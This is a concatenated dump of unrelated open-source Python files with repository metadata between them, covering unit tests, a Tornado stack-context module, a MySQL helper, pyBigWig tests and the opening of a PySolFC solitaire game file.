self.assertTrue(helper.put("test", "test1", 2), "Failed to put" )
self.assertEqual(helper.get("test")["value"], "test1", "Failed to perform overwrite")
time.sleep(2)
self.assertEqual(helper.get("test"), {}, "Failed expire")
self.assertTrue(helper.put("test", "test2", 20000))
self.assertEqual(helper.get("test")["value"], "test2", "Store new value")
helper.write_file("test")
helper = Helper(SimpleHT())
self.assertEqual(helper.get("test"), {}, "DHT isn't empty")
helper.read_file("test")
self.assertEqual(helper.get("test")["value"], "test2", "Load unsuccessful!")
self.assertTrue(helper.put("some_other_key", "some_value", 10000))
self.assertEqual(helper.get("some_other_key")["value"], "some_value", "Different keys")
self.assertEqual(helper.get("test")["value"], "test2", "Verify contents")
# Test via RPC
def test_xmlrpc(self):
output_thread = threading.Thread(target=serve_thread(), args=(9000, ))
output_thread.setDaemon(True)
output_thread.start()
time.sleep(1)
helper = Helper(xmlrpclib.Server("http://127.0.0.1:9000"))
self.assertEqual(helper.get("test"), {}, "DHT isn't empty")
self.assertTrue(helper.put("test", "test", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test", "Failed to perform single get")
self.assertTrue(helper.put("test", "test0", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test0", "Failed to perform overwrite")
self.assertTrue(helper.put("test", "test1", 2), "Failed to put" )
self.assertEqual(helper.get("test")["value"], "test1", "Failed to perform overwrite")
time.sleep(2)
self.assertEqual(helper.get("test"), {}, "Failed expire")
self.assertTrue(helper.put("test", "test2", 20000))
self.assertEqual(helper.get("test")["value"], "test2", "Store new value")
if __name__ == "__main__":
main()
| gpl-2.0 | 4,591,019,497,275,567,600 | 32.675758 | 91 | 0.635112 | false |
meisamhe/GPLshared | Programming/MPI — AMath 483 583, Spring 2013 1.0 documentation_files/sort_k_increasing_decreasing_array.py | 1 | 2421 | import sys
import random
import itertools
from merge_sorted_arrays import merge_sorted_arrays
# @include
def sort_k_increasing_decreasing_array(A):
# Decomposes A into a set of sorted arrays.
sorted_subarrays = []
INCREASING, DECREASING = range(2)
subarray_type = INCREASING
start_idx = 0
for i in range(1, len(A) + 1):
if (i == len(A) or # A is ended. Adds the last subarray.
(A[i - 1] < A[i] and subarray_type == DECREASING) or
(A[i - 1] >= A[i] and subarray_type == INCREASING)):
sorted_subarrays.append(A[start_idx:i] if subarray_type ==
INCREASING else A[i - 1:start_idx - 1:-1])
start_idx = i
subarray_type = (DECREASING
if subarray_type == INCREASING else INCREASING)
return merge_sorted_arrays(sorted_subarrays)
# Pythonic solution, uses a stateful object to trace the monotonic subarrays.
def sort_k_increasing_decreasing_array_pythonic(A):
class Monotonic:
def __init__(self):
self._last = float('-inf')
def __call__(self, curr):
res = curr < self._last
self._last = curr
return res
return merge_sorted_arrays([
list(group)[::-1 if is_decreasing else 1]
for is_decreasing, group in itertools.groupby(A, Monotonic())
])
# @exclude
def simple_test():
A = [1, 2, 3, 2, 1, 4, 5, 10, 9, 4, 4, 1, -1]
assert sorted(A) == sort_k_increasing_decreasing_array(
A) == sort_k_increasing_decreasing_array_pythonic(A)
A = [-2**64, -1, 0, 1, 2, 4, 8, 2**64 - 1]
assert sorted(A) == sort_k_increasing_decreasing_array(
A) == sort_k_increasing_decreasing_array_pythonic(A)
A = list(reversed(A))
assert sorted(A) == sort_k_increasing_decreasing_array(
A) == sort_k_increasing_decreasing_array_pythonic(A)
def main():
simple_test()
for _ in range(1000):
n = int(sys.argv[1]) if len(sys.argv) == 2 else random.randint(1, 10000)
print('n =', n)
A = [random.randint(-999999, 999999) for _ in range(n)]
ans = sort_k_increasing_decreasing_array(A)
# print(*A)
# print(*ans)
assert len(ans) == len(A)
assert ans == sorted(ans)
assert ans == sort_k_increasing_decreasing_array_pythonic(A)
if __name__ == '__main__':
main()
| gpl-3.0 | -7,189,984,414,671,217,000 | 32.164384 | 80 | 0.576621 | false |
jackylee0424/Physioboard | sc-phonegap-tornado-websocket/Server/tornado/stack_context.py | 1 | 8142 | #!/usr/bin/env python
#
# Copyright 2010 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
'''StackContext allows applications to maintain threadlocal-like state
that follows execution as it moves to other execution contexts.
The motivating examples are to eliminate the need for explicit
async_callback wrappers (as in tornado.web.RequestHandler), and to
allow some additional context to be kept for logging.
This is slightly magic, but it's an extension of the idea that an exception
handler is a kind of stack-local state and when that stack is suspended
and resumed in a new context that state needs to be preserved. StackContext
shifts the burden of restoring that state from each call site (e.g.
wrapping each AsyncHTTPClient callback in async_callback) to the mechanisms
that transfer control from one context to another (e.g. AsyncHTTPClient
itself, IOLoop, thread pools, etc).
Example usage::
@contextlib.contextmanager
def die_on_error():
try:
yield
except Exception:
logging.error("exception in asynchronous operation",exc_info=True)
sys.exit(1)
with StackContext(die_on_error):
# Any exception thrown here *or in callback and its desendents*
# will cause the process to exit instead of spinning endlessly
# in the ioloop.
http_client.fetch(url, callback)
ioloop.start()
'''
from __future__ import with_statement
import contextlib
import functools
import itertools
import sys
import threading
class _State(threading.local):
def __init__(self):
self.contexts = ()
_state = _State()
class StackContext(object):
'''Establishes the given context as a StackContext that will be transferred.
Note that the parameter is a callable that returns a context
manager, not the context itself. That is, where for a
non-transferable context manager you would say::
with my_context():
StackContext takes the function itself rather than its result::
with StackContext(my_context):
'''
def __init__(self, context_factory):
self.context_factory = context_factory
# Note that some of this code is duplicated in ExceptionStackContext
# below. ExceptionStackContext is more common and doesn't need
# the full generality of this class.
def __enter__(self):
self.old_contexts = _state.contexts
# _state.contexts is a tuple of (class, arg) pairs
_state.contexts = (self.old_contexts +
((StackContext, self.context_factory),))
try:
self.context = self.context_factory()
self.context.__enter__()
except Exception:
_state.contexts = self.old_contexts
raise
def __exit__(self, type, value, traceback):
try:
return self.context.__exit__(type, value, traceback)
finally:
_state.contexts = self.old_contexts
class ExceptionStackContext(object):
'''Specialization of StackContext for exception handling.
The supplied exception_handler function will be called in the
event of an uncaught exception in this context. The semantics are
similar to a try/finally clause, and intended use cases are to log
an error, close a socket, or similar cleanup actions. The
exc_info triple (type, value, traceback) will be passed to the
exception_handler function.
If the exception handler returns true, the exception will be
consumed and will not be propagated to other exception handlers.
'''
def __init__(self, exception_handler):
self.exception_handler = exception_handler
def __enter__(self):
self.old_contexts = _state.contexts
_state.contexts = (self.old_contexts +
((ExceptionStackContext, self.exception_handler),))
def __exit__(self, type, value, traceback):
try:
if type is not None:
return self.exception_handler(type, value, traceback)
finally:
_state.contexts = self.old_contexts
class NullContext(object):
'''Resets the StackContext.
Useful when creating a shared resource on demand (e.g. an AsyncHTTPClient)
where the stack that caused the creating is not relevant to future
operations.
'''
def __enter__(self):
self.old_contexts = _state.contexts
_state.contexts = ()
def __exit__(self, type, value, traceback):
_state.contexts = self.old_contexts
class _StackContextWrapper(functools.partial):
pass
def wrap(fn):
'''Returns a callable object that will resore the current StackContext
when executed.
Use this whenever saving a callback to be executed later in a
different execution context (either in a different thread or
asynchronously in the same thread).
'''
if fn is None or fn.__class__ is _StackContextWrapper:
return fn
# functools.wraps doesn't appear to work on functools.partial objects
#@functools.wraps(fn)
def wrapped(callback, contexts, *args, **kwargs):
if contexts is _state.contexts or not contexts:
callback(*args, **kwargs)
return
if not _state.contexts:
new_contexts = [cls(arg) for (cls, arg) in contexts]
# If we're moving down the stack, _state.contexts is a prefix
# of contexts. For each element of contexts not in that prefix,
# create a new StackContext object.
# If we're moving up the stack (or to an entirely different stack),
# _state.contexts will have elements not in contexts. Use
# NullContext to clear the state and then recreate from contexts.
elif (len(_state.contexts) > len(contexts) or
any(a[1] is not b[1]
for a, b in itertools.izip(_state.contexts, contexts))):
# contexts have been removed or changed, so start over
new_contexts = ([NullContext()] +
[cls(arg) for (cls,arg) in contexts])
else:
new_contexts = [cls(arg)
for (cls, arg) in contexts[len(_state.contexts):]]
if len(new_contexts) > 1:
with _nested(*new_contexts):
callback(*args, **kwargs)
elif new_contexts:
with new_contexts[0]:
callback(*args, **kwargs)
else:
callback(*args, **kwargs)
return _StackContextWrapper(wrapped, fn, _state.contexts)
@contextlib.contextmanager
def _nested(*managers):
"""Support multiple context managers in a single with-statement.
Copied from the python 2.6 standard library. It's no longer present
in python 3 because the with statement natively supports multiple
context managers, but that doesn't help if the list of context
managers is not known until runtime.
"""
exits = []
vars = []
exc = (None, None, None)
try:
for mgr in managers:
exit = mgr.__exit__
enter = mgr.__enter__
vars.append(enter())
exits.append(exit)
yield vars
except:
exc = sys.exc_info()
finally:
while exits:
exit = exits.pop()
try:
if exit(*exc):
exc = (None, None, None)
except:
exc = sys.exc_info()
if exc != (None, None, None):
# Don't rely on sys.exc_info() still containing
# the right information. Another exception may
# have been raised and caught by an exit method
raise exc[0], exc[1], exc[2]
| mit | 6,455,677,149,505,853,000 | 35.675676 | 80 | 0.646893 | false |
simmol/battletech-character-creator | load_data.py | 1 | 1267 | import yaml
# Get base stats and values
def get_base_attributes():
with open( 'data/base_stats.yaml', 'r' ) as ff:
attributes = yaml.load( ff )
return attributes
# Get Affiliations data
def get_affiliations():
with open( 'data/affiliations.yaml', 'r' ) as f:
affiliations_data = yaml.load( f )
return affiliations_data
# Get Early Childhood
def get_early_childhoods():
with open( 'data/early_childhood.yaml', 'r' ) as f:
early_childhoods = yaml.load( f )
return early_childhoods
# Get Late Childhood data
def get_late_childhoods():
with open( 'data/late_childhood.yaml', 'r' ) as f:
late_childhoods = yaml.load( f )
return late_childhoods
# Get Higher Education
def get_higher_education():
with open( 'data/higher_education.yaml', 'r' ) as f:
higher_educations = yaml.load( f )
return higher_educations
# Get Master Fields list
def get_master_fields_list():
with open( 'data/master_fields_list.yaml', 'r' ) as f:
master_fields_list = yaml.load( f )
return master_fields_list
# Get Real life modules
def get_real_life_modules():
with open( 'data/real_life.yaml', 'r' ) as f:
real_life_modules = yaml.load( f )
return real_life_modules
| gpl-2.0 | -817,951,340,370,376,100 | 21.22807 | 58 | 0.649566 | false |
briankinney/project-euler | euler502/models/test/square_solver.py | 1 | 1077 | #! /usr/bin/env python
from euler502.models.square_solver import SquareCastleSolver
from euler502.models.castle import SlowSolver
from eulercommon.constants import bigprime
import unittest
class TestSquareSolver(unittest.TestCase):
def test_F(self):
def test_helper(width, height):
sq = SquareCastleSolver(height, 31)
ss = SlowSolver(width, height, 31)
self.assertEqual(sq.F(width), ss.F(width))
test_helper(4, 2)
for i in range(10):
test_helper(i + 1, 40)
for i in range(10):
test_helper(40, i + 2)
def test_supplied_answers(self):
def test_pair(width, height, solution):
print "Testing F({width},{height}) = {solution}".format(**locals())
sqs = SquareCastleSolver(height, 11)
self.assertEquals(sqs.F(width), solution)
test_pair(4, 2, 10)
test_pair(13, 10, 3729050610636 % 11)
test_pair(10, 13, 37959702514 % 11)
#test_pair(100, 100, 841913936)
if __name__ == '__main__':
unittest.main()
| mit | 5,340,415,658,812,210,000 | 29.771429 | 79 | 0.608171 | false |
ningmo/pynote | MySqlHelper.py | 1 | 1150 | #-*- coding:utf-8 -*-
import MySQLdb
class MySqlHelper:
@staticmethod
def FetchSql(host, user, password, database, sql, port=3306):
try:
conn = MySQLdb.connect (host=host,
user=user,
passwd=password,
db=database,
charset="utf8")
cursor = conn.cursor ()
cursor.execute (sql)
rows = cursor.fetchall ()
cursor.close ()
conn.close ()
return rows
except Exception,what:
print "Error in ExecuteSql:%s" % sql
raise what
@staticmethod
def ExecuteSql(host, user, password, database, sql, port=3306):
try:
conn = MySQLdb.connect (host=host, user=user, passwd=password, db=database, charset="utf8")
cursor = conn.cursor ()
rows = cursor.execute (sql)
cursor.close ()
conn.close ()
return rows
except Exception,what:
print "Error in ExecuteSql:%s" % sql
raise what | agpl-3.0 | -5,288,608,114,324,368,000 | 33.878788 | 103 | 0.482609 | false |
kei10in/dotfav | features/steps/symlink_step.py | 1 | 1342 | # -*- coding: utf-8 -*-
from hamcrest import *
from utils import *
@given('dotfiles home directory contains a file named "{filename}"')
def step_impl(context, filename):
(dotfiles_home / filename).touch()
@given('dotfiles home directory contains a directory named "{dirname}"')
def step_impl(context, dirname):
(dotfiles_home / dirname).mkdir()
@given('dotfiles contains config file')
def step_impl(context):
create_config_file(context.text)
@then('no files are symlinked')
def step_impl(context):
symlink_path = [p.resolve() for p in home.iterdir() if p.is_symlink()]
dotfiles = dotfiles_home.rglob('*')
assert_that(symlink_path,
any_of(is_(empty()), is_not(contains(is_in(dotfiles)))))
@then('"{name}" in home symlinks to "{target}" in dotfiles home')
def step_impl(context, name, target):
path = home / name
target_path = dotfiles_home / target
assert_that(path.is_symlink(), 'path must be symlink file')
assert_that(path.resolve(), equal_to(target_path))
@then('"{filename}" in home is file')
def step_impl(context, filename):
path = home / filename
assert_that(path.is_file(), 'path must be file')
@then('"{dirname}" in home is directory')
def step_impl(context, dirname):
path = home / dirname
assert_that(path.is_dir(), 'path must be directory')
| mit | -7,677,806,799,897,577,000 | 26.387755 | 74 | 0.669896 | false |
deeptools/pyBigWig | pyBigWigTest/test.py | 1 | 13205 | import pyBigWig
import tempfile
import os
import sys
import hashlib
import numpy as np
class TestRemote():
fname = "http://raw.githubusercontent.com/dpryan79/pyBigWig/master/pyBigWigTest/test.bw"
def doOpen(self):
bw = pyBigWig.open(self.fname)
assert(bw is not None)
return bw
def doOpenWith(self):
with pyBigWig.open(self.fname) as bw:
assert(bw.chroms() == {'1': 195471971, '10': 130694993})
def doChroms(self, bw):
assert(bw.chroms() == {'1': 195471971, '10': 130694993})
assert(bw.chroms("1") == 195471971)
assert(bw.chroms("c") is None)
def doHeader(self, bw):
assert(bw.header() == {'maxVal': 2, 'sumData': 272, 'minVal': 0, 'version': 4, 'sumSquared': 500, 'nLevels': 1, 'nBasesCovered': 154})
def doStats(self, bw):
assert(bw.stats("1", 0, 3) == [0.2000000054637591])
assert(bw.stats("1", 0, 3, type="max") == [0.30000001192092896])
assert(bw.stats("1",99,200, type="max", nBins=2) == [1.399999976158142, 1.5])
assert(bw.stats("1",np.int64(99), np.int64(200), type="max", nBins=2) == [1.399999976158142, 1.5])
assert(bw.stats("1") == [1.3351851569281683])
def doValues(self, bw):
assert(bw.values("1", 0, 3) == [0.10000000149011612, 0.20000000298023224, 0.30000001192092896])
assert(bw.values("1", np.int64(0), np.int64(3)) == [0.10000000149011612, 0.20000000298023224, 0.30000001192092896])
#assert(bw.values("1", 0, 4) == [0.10000000149011612, 0.20000000298023224, 0.30000001192092896, 'nan'])
def doIntervals(self, bw):
assert(bw.intervals("1", 0, 3) == ((0, 1, 0.10000000149011612), (1, 2, 0.20000000298023224), (2, 3, 0.30000001192092896)))
assert(bw.intervals("1", np.int64(0), np.int64(3)) == ((0, 1, 0.10000000149011612), (1, 2, 0.20000000298023224), (2, 3, 0.30000001192092896)))
assert(bw.intervals("1") == ((0, 1, 0.10000000149011612), (1, 2, 0.20000000298023224), (2, 3, 0.30000001192092896), (100, 150, 1.399999976158142), (150, 151, 1.5)))
def doSum(self, bw):
assert(bw.stats("1", 100, 151, type="sum", nBins=2) == [35.0, 36.5])
def doWrite(self, bw):
ofile = tempfile.NamedTemporaryFile(delete=False)
oname = ofile.name
ofile.close()
bw2 = pyBigWig.open(oname, "w")
assert(bw2 is not None)
#Since this is an unordered dict(), iterating over the items can swap the order!
chroms = [("1", bw.chroms("1")), ("10", bw.chroms("10"))]
assert(len(bw.chroms()) == 2)
bw2.addHeader(chroms, maxZooms=1)
#Copy the input file
for c in chroms:
ints = bw.intervals(c[0])
chroms2 = []
starts = []
ends = []
values = []
for entry in ints:
chroms2.append(c[0])
starts.append(entry[0])
ends.append(entry[1])
values.append(entry[2])
bw2.addEntries(chroms2, starts, ends=ends, values=values)
bw2.close()
#Ensure that the copied file has the same entries and max/min/etc.
bw2 = pyBigWig.open(oname)
assert(bw.header() == bw2.header())
assert(bw.chroms() == bw2.chroms())
for c in chroms:
ints1 = bw.intervals(c[0])
ints2 = bw2.intervals(c[0])
assert(ints1 == ints2)
bw.close()
bw2.close()
#Clean up
os.remove(oname)
def doWrite2(self):
'''
Test all three modes of storing entries. Also test to ensure that we get error messages when doing something silly
This is a modified version of the writing example from libBigWig
'''
chroms = ["1"]*6
starts = [0, 100, 125, 200, 220, 230, 500, 600, 625, 700, 800, 850]
ends = [5, 120, 126, 205, 226, 231]
values = [0.0, 1.0, 200.0, -2.0, 150.0, 25.0, 0.0, 1.0, 200.0, -2.0, 150.0, 25.0, -5.0, -20.0, 25.0, -5.0, -20.0, 25.0]
ofile = tempfile.NamedTemporaryFile(delete=False)
oname = ofile.name
ofile.close()
bw = pyBigWig.open(oname, "w")
bw.addHeader([("1", 1000000), ("2", 1500000)])
#Intervals
bw.addEntries(chroms[0:3], starts[0:3], ends=ends[0:3], values=values[0:3])
bw.addEntries(chroms[3:6], starts[3:6], ends=ends[3:6], values=values[3:6])
#IntervalSpans
bw.addEntries("1", starts[6:9], values=values[6:9], span=20)
bw.addEntries("1", starts[9:12], values=values[9:12], span=20)
#IntervalSpanSteps, this should instead take an int
bw.addEntries("1", 900, values=values[12:15], span=20, step=30)
bw.addEntries("1", 990, values=values[15:18], span=20, step=30)
#Attempt to add incorrect values. These MUST raise an exception
try:
bw.addEntries(chroms[0:3], starts[0:3], ends=ends[0:3], values=values[0:3])
assert(1==0)
except RuntimeError:
pass
try:
bw.addEntries("1", starts[6:9], values=values[6:9], span=20)
assert(1==0)
except RuntimeError:
pass
try:
bw.addEntries("3", starts[6:9], values=values[6:9], span=20)
assert(1==0)
except RuntimeError:
pass
try:
bw.addEntries("1", 900, values=values[12:15], span=20, step=30)
assert(1==0)
except RuntimeError:
pass
#Add a few intervals on a new chromosome
bw.addEntries(["2"]*3, starts[0:3], ends=ends[0:3], values=values[0:3])
bw.close()
#check md5sum, this is the simplest method to check correctness
h = hashlib.md5(open(oname, "rb").read()).hexdigest()
assert(h=="ef104f198c6ce8310acc149d0377fc16")
#Clean up
os.remove(oname)
def doWriteEmpty(self):
ofile = tempfile.NamedTemporaryFile(delete=False)
oname = ofile.name
ofile.close()
bw = pyBigWig.open(oname, "w")
bw.addHeader([("1", 1000000), ("2", 1500000)])
bw.close()
#check md5sum
h = hashlib.md5(open(oname, "rb").read()).hexdigest()
assert(h=="361c600e5badf0b45d819552a7822937")
#Ensure we can open and get reasonable results
bw = pyBigWig.open(oname)
assert(bw.chroms() == {'1': 1000000, '2': 1500000})
assert(bw.intervals("1") == None)
assert(bw.values("1", 0, 1000000) == [])
assert(bw.stats("1", 0, 1000000, nBins=2) == [None, None])
bw.close()
#Clean up
os.remove(oname)
def doWriteNumpy(self):
ofile = tempfile.NamedTemporaryFile(delete=False)
oname = ofile.name
ofile.close()
bw = pyBigWig.open(oname, "w")
bw.addHeader([("chr1", 100), ("chr2", 150), ("chr3", 200), ("chr4", 250)])
chroms = np.array(["chr1"] * 2 + ["chr2"] * 2 + ["chr3"] * 2 + ["chr4"] * 2)
starts = np.array([0, 10, 40, 50, 60, 70, 80, 90], dtype=np.int64)
ends = np.array([5, 15, 45, 55, 65, 75, 85, 95], dtype=np.int64)
values0 = np.array(np.random.random_sample(8), dtype=np.float64)
bw.addEntries(chroms, starts, ends=ends, values=values0)
bw.close()
vals = [(x, y, z) for x, y, z in zip(starts, ends, values0)]
bw = pyBigWig.open(oname)
assert(bw.chroms() == {'chr1': 100, 'chr2': 150, 'chr3': 200, 'chr4': 250})
for idx1, chrom in enumerate(["chr1", "chr2", "chr3", "chr4"]):
for idx2, tup in enumerate(bw.intervals(chrom)):
assert(tup[0] == starts[2 * idx1 + idx2])
assert(tup[1] == ends[2 * idx1 + idx2])
assert(np.isclose(tup[2], values0[2 * idx1 + idx2]))
bw.close()
#Clean up
os.remove(oname)
def testAll(self):
bw = self.doOpen()
self.doChroms(bw)
if not self.fname.startswith("http"):
self.doHeader(bw)
self.doStats(bw)
self.doSum(bw)
self.doValues(bw)
self.doIntervals(bw)
self.doWrite(bw)
self.doOpenWith()
self.doWrite2()
self.doWriteEmpty()
self.doWriteNumpy()
bw.close()
class TestLocal():
def testFoo(self):
blah = TestRemote()
blah.fname = os.path.dirname(pyBigWig.__file__) + "/pyBigWigTest/test.bw"
blah.testAll()
class TestBigBed():
def testBigBed(self):
fname = os.path.dirname(pyBigWig.__file__) + "/pyBigWigTest/test.bigBed"
bb = pyBigWig.open(fname)
assert(bb is not None)
assert(bb.isBigWig() == 0)
assert(bb.isBigBed() == 1)
SQL = """table RnaElements
"BED6 + 3 scores for RNA Elements data "
(
string chrom; "Reference sequence chromosome or scaffold"
uint chromStart; "Start position in chromosome"
uint chromEnd; "End position in chromosome"
string name; "Name of item"
uint score; "Normalized score from 0-1000"
char[1] strand; "+ or - or . for unknown"
float level; "Expression level such as RPKM or FPKM. Set to -1 for no data."
float signif; "Statistical significance such as IDR. Set to -1 for no data."
uint score2; "Additional measurement/count e.g. number of reads. Set to 0 for no data."
)
"""
output = bb.SQL()
if isinstance(output, bytes):
output = output.decode('ASCII')
assert(output == SQL)
o = bb.entries('chr1',10000000,10020000)
expected = [(10009333, 10009640, '61035\t130\t-\t0.026\t0.42\t404'), (10014007, 10014289, '61047\t136\t-\t0.029\t0.42\t404'), (10014373, 10024307, '61048\t630\t-\t5.420\t0.00\t2672399')]
assert(o == expected)
o = bb.entries('chr1',np.int64(10000000),np.int64(10020000))
assert(o == expected)
bb.close()
class TestNumpy():
def testNumpy(self):
import os
if pyBigWig.numpy == 0:
return 0
import numpy as np
bw = pyBigWig.open("/tmp/delete.bw", "w")
bw.addHeader([("1", 1000)], maxZooms=0)
# Type 0
chroms = np.array(["1"] * 10)
starts = np.array([0, 10, 20, 30, 40, 50, 60, 70, 80, 90], dtype=np.int64)
ends = np.array([5, 15, 25, 35, 45, 55, 65, 75, 85, 95], dtype=np.int64)
values0 = np.array(np.random.random_sample(10), dtype=np.float64)
bw.addEntries(chroms, starts, ends=ends, values=values0)
starts = np.array([100, 110, 120, 130, 140, 150, 160, 170, 180, 190], dtype=np.int64)
ends = np.array([105, 115, 125, 135, 145, 155, 165, 175, 185, 195], dtype=np.int64)
values1 = np.array(np.random.random_sample(10), dtype=np.float64)
bw.addEntries(chroms, starts, ends=ends, values=values1)
# Type 1, single chrom, multiple starts/values, single span
starts = np.array([200, 210, 220, 230, 240, 250, 260, 270, 280, 290], dtype=np.int64)
values2 = np.array(np.random.random_sample(10), dtype=np.float64)
bw.addEntries(np.str("1"), starts, span=np.int(8), values=values2)
starts = np.array([300, 310, 320, 330, 340, 350, 360, 370, 380, 390], dtype=np.int64)
values3 = np.array(np.random.random_sample(10), dtype=np.float64)
bw.addEntries(np.str("1"), starts, span=np.int(8), values=values3)
# Type 2, single chrom/start/span/step, multiple values
values4 = np.array(np.random.random_sample(10), dtype=np.float64)
bw.addEntries(np.str("1"), np.int(400), span=np.int(8), step=np.int64(2), values=values4)
values5 = np.array(np.random.random_sample(10), dtype=np.float64)
bw.addEntries(np.str("1"), np.int(500), span=np.int(8), step=np.int64(2), values=values5)
bw.close()
bw = pyBigWig.open("/tmp/delete.bw")
assert(bw is not None)
def compy(start, v2):
v = []
for t in bw.intervals("1", start, start + 100):
v.append(t[2])
v = np.array(v)
assert(np.all(np.abs(v - v2) < 1e-5))
compy(0, values0)
compy(100, values1)
compy(200, values2)
compy(300, values3)
compy(400, values4)
compy(500, values5)
# Get values as a numpy array
foo = bw.values("1", 0, 100, numpy=False)
assert(isinstance(foo, list))
foo = bw.values("1", 0, 100, numpy=True)
assert(isinstance(foo, np.ndarray))
bw.close()
os.remove("/tmp/delete.bw")
def testNumpyValues(self):
if pyBigWig.numpy == 0:
return 0
import numpy as np
fname = "http://raw.githubusercontent.com/dpryan79/pyBigWig/master/pyBigWigTest/test.bw"
bw = pyBigWig.open(fname, "r")
assert np.allclose(
bw.values("1", 0, 20, numpy=True),
np.array(bw.values("1", 0, 20), dtype=np.float32),
equal_nan=True
)
assert np.allclose(
bw.stats("1", 0, 20, "mean", 5, numpy=True),
np.array(bw.stats("1", 0, 20, "mean", 5), dtype=np.float64),
equal_nan=True
)
| mit | 299,786,902,870,758,200 | 39.015152 | 194 | 0.565165 | false |
jimsize/PySolFC | pysollib/games/picturegallery.py | 1 | 20413 | #!/usr/bin/env python
# -*- mode: python; coding: utf-8; -*-
# ---------------------------------------------------------------------------##
#
# Copyright (C) 1998-2003 Markus Franz Xaver Johannes Oberhumer
# Copyright (C) 2003 Mt. Hood Playing Card Co.
# Copyright (C) 2005-2009 Skomoroh
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# ---------------------------------------------------------------------------##
# imports
# PySol imports
from pysollib.gamedb import registerGame, GameInfo, GI
from pysollib.game import Game
from pysollib.layout import Layout
from pysollib.hint import AbstractHint
from pysollib.util import ACE, KING, QUEEN
from pysollib.stack import \
BasicRowStack, \
DealRowTalonStack, \
InvisibleStack, \
RK_FoundationStack, \
SS_FoundationStack, \
SS_RowStack, \
Stack, \
StackWrapper, \
WasteStack, \
WasteTalonStack
# ************************************************************************
# *
# ************************************************************************
class PictureGallery_Hint(AbstractHint):
def computeHints(self):
game = self.game
# 1) try if we can drop a card (i.e. an Ace)
for r in game.sg.dropstacks:
t, n = r.canDropCards(game.s.foundations)
if t and n == 1:
c = r.getCard()
assert t is not r and c
assert c.rank == ACE
if r in game.s.tableaux:
base_score = 90000 + (4 - r.cap.base_rank)
else:
base_score = 90000
score = base_score + 100 * (self.K - c.rank)
self.addHint(score, 1, r, t)
# 2) try if we can move a card to the tableaux
if not self.hints:
for r in game.sg.dropstacks:
pile = r.getPile()
if not pile or len(pile) != 1:
continue
if r in game.s.tableaux:
rr = self.ClonedStack(r, stackcards=r.cards[:-1])
if rr.acceptsCards(None, pile):
# do not move a card that is already in correct place
continue
base_score = 80000 + (4 - r.cap.base_rank)
else:
base_score = 80000
# find a stack that would accept this card
for t in game.s.tableaux:
if t is not r and t.acceptsCards(r, pile):
score = base_score + 100 * (self.K - pile[0].rank)
self.addHint(score, 1, r, t)
break
# 3) Try if we can move a card from the tableaux
# to a row stack. This can only happen if there are
# no more cards to deal.
if not self.hints:
for r in game.s.tableaux:
pile = r.getPile()
if not pile or len(pile) != 1:
continue
rr = self.ClonedStack(r, stackcards=r.cards[:-1])
if rr.acceptsCards(None, pile):
# do not move a card that is already in correct place
continue
# find a stack that would accept this card
for t in game.s.rows:
if t is not r and t.acceptsCards(r, pile):
score = 70000 + 100 * (self.K - pile[0].rank)
self.addHint(score, 1, r, t)
break
# 4) try if we can move a card within the row stacks
if not self.hints:
for r in game.s.rows:
pile = r.getPile()
if not pile:
continue
lp = len(pile)
lr = len(r.cards)
assert 1 <= lp <= lr
rpile = r.cards[:(lr-lp)] # remaining pile
if not pile or len(pile) != 1 or len(pile) == len(r.cards):
continue
base_score = 60000
# find a stack that would accept this card
for t in game.s.rows:
if self.shallMovePile(r, t, pile, rpile):
score = base_score + 100 * (self.K - pile[0].rank)
self.addHint(score, 1, r, t)
break
# 5) try if we can deal cards
if self.level >= 2:
if game.canDealCards():
self.addHint(self.SCORE_DEAL, 0, game.s.talon, None)
# ************************************************************************
# * Picture Gallery
# ************************************************************************
# this Foundation only accepts Aces
class PictureGallery_Foundation(RK_FoundationStack):
def __init__(self, x, y, game):
RK_FoundationStack.__init__(
self, x, y, game, base_rank=ACE, dir=0, max_move=0, max_cards=8)
self.CARD_YOFFSET = min(30, self.game.app.images.CARD_YOFFSET + 10)
def getBottomImage(self):
return self.game.app.images.getLetter(ACE)
def closeStack(self):
if len(self.cards) == 8:
if self.game.moves.state not in \
(self.game.S_REDO, self.game.S_RESTORE):
self.game.flipAllMove(self)
def canFlipCard(self):
return False
class PictureGallery_TableauStack(SS_RowStack):
def __init__(self, x, y, game, base_rank, yoffset, dir=3, max_cards=4):
SS_RowStack.__init__(
self, x, y, game,
base_rank=base_rank, dir=dir, max_cards=max_cards, max_accept=1)
self.CARD_YOFFSET = yoffset
def acceptsCards(self, from_stack, cards):
if not SS_RowStack.acceptsCards(self, from_stack, cards):
return False
# check that the base card is correct
if self.cards and self.cards[0].rank != self.cap.base_rank:
return False
return True
getBottomImage = Stack._getLetterImage
class PictureGallery_RowStack(BasicRowStack):
def acceptsCards(self, from_stack, cards):
if not BasicRowStack.acceptsCards(self, from_stack, cards):
return False
# check
if self.cards or self.game.s.talon.cards:
return False
return True
getBottomImage = Stack._getTalonBottomImage
# ************************************************************************
# *
# ************************************************************************
class PictureGallery(Game):
Hint_Class = PictureGallery_Hint
Foundation_Class = PictureGallery_Foundation
TableauStack_Classes = [
StackWrapper(
PictureGallery_TableauStack, base_rank=3, max_cards=4, dir=3),
StackWrapper(
PictureGallery_TableauStack, base_rank=2, max_cards=4, dir=3),
StackWrapper(
PictureGallery_TableauStack, base_rank=1, max_cards=4, dir=3),
]
RowStack_Class = StackWrapper(PictureGallery_RowStack, max_accept=1)
Talon_Class = DealRowTalonStack
#
# game layout
#
def createGame(self, waste=False):
rows = len(self.TableauStack_Classes)
# create layout
l, s = Layout(self), self.s
TABLEAU_YOFFSET = min(9, max(3, l.YOFFSET // 3))
# set window
